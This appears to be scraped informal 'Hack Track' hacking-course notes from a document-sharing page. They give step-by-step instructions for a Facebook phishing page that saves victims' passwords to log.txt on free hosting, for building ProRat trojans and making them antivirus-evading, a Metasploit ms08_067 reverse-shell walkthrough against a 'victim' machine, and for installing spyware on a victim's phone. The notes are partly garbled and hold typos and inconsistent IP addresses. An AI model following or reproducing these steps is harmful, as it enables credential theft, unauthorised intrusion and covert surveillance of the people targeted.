Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                

Hack Track

Download as txt, pdf, or txt
Download as txt, pdf, or txt
You are on page 1of 3

webinfinium----- website

ADMIN - finance- goindigo

----------------------------------------------------------------------------------

Reverse Engineering:
MOV(move): going to moove the data from sourcec to destination.
syntax: MOV dest,src

------------------------
Debug_Tools:
OllyDBG : DEbugger available
www.ollydbg.com

-----------------------------------------------------------------------------------
----
cracking software: Lena's Tutorials on Reverse Engineering ---- 20 videos. [20
wayes to debug a software]
-----------------------------------------------------------------------------------
------

Phishing Method:

Open Website -- view 'source code'


-- search 'action' available inside form tag
-- change action to login.php
and keep only method="post" and action="login.php" in the form
And this file as HTML

Fb.html -- login.php--log.txt

step 1 : Register your website


For free website creation.....
www.byethost.com
www.hostinger.in
www.110mb.com
www.freehostia.com
www.000webhost.com
after creating

rohith.000webhost.com/cpanel
after opening control panel --- goto file upload ----
in that go to public_html
create a folder and upload fb.html, login.php, log.txt and save
And change permission to 7 7 7

url shortner- goo.gl{It will give short ur url}

All passwords will be saved in log.txt......


-----------------------------------------------------------------------------------
-----------------------------------
virus, worms, trojans

Virus- Damage data


Worm - Transmit virus over network / internet
Trojens- Server-client model
FUD - Fully Undetected By antivirus
------------
Two types of trojans
"fuglekos.com/ip-grabber/" - to grab others ip address by creating an image.
1] Direct- "Prorat v1.9 Software" it is to create trojan and attach to any type of
file like jpg, .exe etc.... by thi we can use thers pc without they noticing

2]Reverse-"VPN-Virtual Private Network" by using this we can convert dynamic ip to


static ip for free.
Download softether vpn-client manager from Softether Website
Download vpngate.net- download VPN list

virustotal.com--"To check wheter the file automatically detected virus in victims


pc"

FUD-Fully Undetectable
obsidium software: this is software protection so that we can encript the trojan
file and antivirus cannot detect it.

browse:-
www.cypherx.org

software Protection suite

-----------------------------------------------------------------------------------
--------------------------------------
Hacking using VM WARE(BlackTrack Or Kali Linux)

BlackTrack - Kali Linux : both are linux based os....\ By the hackers for the
hackers (used for only hacking)

www.cve.mitre.org - vulnerabilities(we can report vulnerabilities)

when we report it they will give one unique code .

www.exploit-db.com - exploits ( we can know bout vulnerabilities)

Metasploit : 5 commands
- vulnerability : A weakness that allows an attacker to compromise the security
of system.
- Exploit: code/step by step method which allows an attacker to take an
adavantage of system
- Payload : Code which runson the system after exploitation
- Encoders : Safety

__________ steps
BT : IP : attacker : 132.168.140.132
WINXP: IP : Victim : 192.168.140.141
---------------------------------------------------------------------------
Process::

msfconsole(In Terminal Box)


msf>search internet explorer(crome/safari/smb/mozilla etc)
msf>use exploit/windows/smb/ms08_067 netapi
msf>show options
msf>set RHOST 192.168.140.141
msf>show payloads
msf>set payload windows/shell/reverse_tcp
msf>show options
we will get options of LHOST
msf>set LHOST 192.168.140.132
msf>exploit
-----------------------------------------------------------------------------------
---------
Armitage - GUI of metasploit( we can use without commands)
___________________________________________________________________________________
__________________________________

ANDROID HACKING

step1 : Download Application ...[ spytomobile.com/d ]


step2 : Install it on victims cell phne
step3 : go to widgets & data_backup widget
step4 : Enter your mail ID
step5 : Create Account
step5 : Check your mail and enjoy.

data_backup.
___________________________________________________________________________________
____________________________________

You might also like